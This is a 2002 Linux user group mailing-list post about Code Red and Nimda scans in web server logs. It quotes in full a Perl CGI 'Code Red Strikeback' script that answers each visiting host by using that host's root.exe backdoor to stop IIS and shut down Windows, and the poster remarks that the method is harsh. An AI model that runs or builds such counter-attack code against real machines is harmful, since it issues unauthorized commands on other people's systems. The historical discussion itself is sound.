From: "Mick Ohrberg" <micke@kc.rr.com> Subject: RE: Web Server Scans Date: Sun, 7 Jul 2002 10:54:28 -0500 Message-ID: <000001c225d0$627fc080$6400a8c0@mick>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I can't remember if this is for Code Red or Nimda...
- -------------------8<----------------------------
#!/usr/bin/perl -w
# default.ida in perl
# Copyright 2001 Sam Phillips <sam@dasbistro.com>
# ideas borrowed from Erin Quinlan <erin@dasbistro.com>
# ideas provided by various Internet folk, and all those darn
# Crackmonkeys (http://www.crackmonkey.org) and Pigdoggers
# (http://www.pigdog.org)
#
# Things that this should do...
# * Send email to the machine owner
#
# This program is free software; you can redistribute it and/or
modify
# it under the terms of the GNU General Public License as published
by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
02111-1307
# USA
#
use LWP::UserAgent;
$|++;
print "Content-Type: text/html\n\n";
if (length ($ENV{QUERY_STRING}) > 0) {
my $ua = new LWP::UserAgent;
$ua->agent ("Code Red Strikeback");
$ua->timeout (20);
my $iis_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop");
print "probulating... <br>";
my $resp = $ua->request ($iis_stop_req);
if ($resp->is_success) {
print "Appears we have shut down IIS...<br>";
my $server_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll
,SHExi
tWindowsEx+5");
$resp = $ua->request ($iis_stop_req);
if ($resp->is_success) {
print "Appears that we have also shutdown whatever OS
too...<br>";
}
# ok this will do magic email stuff when I get a chance to write it.
} else { print "<h2>Boy! Are you yankin' my chain?!?</h2>";
}
}
print <<EOF;
<p>
<h1>Code Red Counter Attack!</h1>
</p>
<p>
<H2>If you are reading this page, then you are probably curious...
</H2>
</p>
<p>
This page is actually a script that will connect to your machine and
try to shut it down. Since you are seeing this you probably aren't
a
Code Red infected box.
</p>
<p>
This will only work if you are infected with the "code red" virus
which
isn't really a virus but is a part of the Microsoft Internet
Information Server (IIS).
</p>
<p>
EOF
- -------------------8<----------------------------
Well, I guess Code Red. Rather harsh method of trying to stop the
infection of this virus...
| -----Original Message-----
| From: owner-kclug@marauder.illiana.net
| [mailto:owner-kclug@marauder.illiana.net] On Behalf Of
| dattaway@attaway.net
| Sent: Sunday, July 07, 2002 7:18 AM
| To: 'kclug@kclug.org'
| Subject: Re: Web Server Scans
|
|
| On Sat, 6 Jul 2002, chuckx wrote:
|
| > Those log entries are the result of a common IIS virus
| affectionately
| > referred to as Nimda.
| >
| > It's nothing to worry about.
| >
| > If you want you logs to not be so cluttered, check out the
| following
| > thread: http://www.webmasterworld.com/forum23/620.htm
|
| I've heard another great way to eliminate nimda entries is to
| set up the real web pages on a virtual server, leaving the
| default for nimda. From what I am told, nimda does not do
| hostnames, just the numbers and it will leave all the virtual
| logs alone.
|
|
|
|
| KC Linux Users Group -- to unsubscribe send mail to
| majordomo@kclug.org Enter without the quotes in body of
| message "unsubscribe kclug"
|
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBPShnPUkUEW0dd/1DEQLujQCfaMmocUd3uhFtWr18lRBim/ROmNAAoJWt
fDQjl21szje3ovPF4KOjXTxc
=oT7/
-----END PGP SIGNATURE-----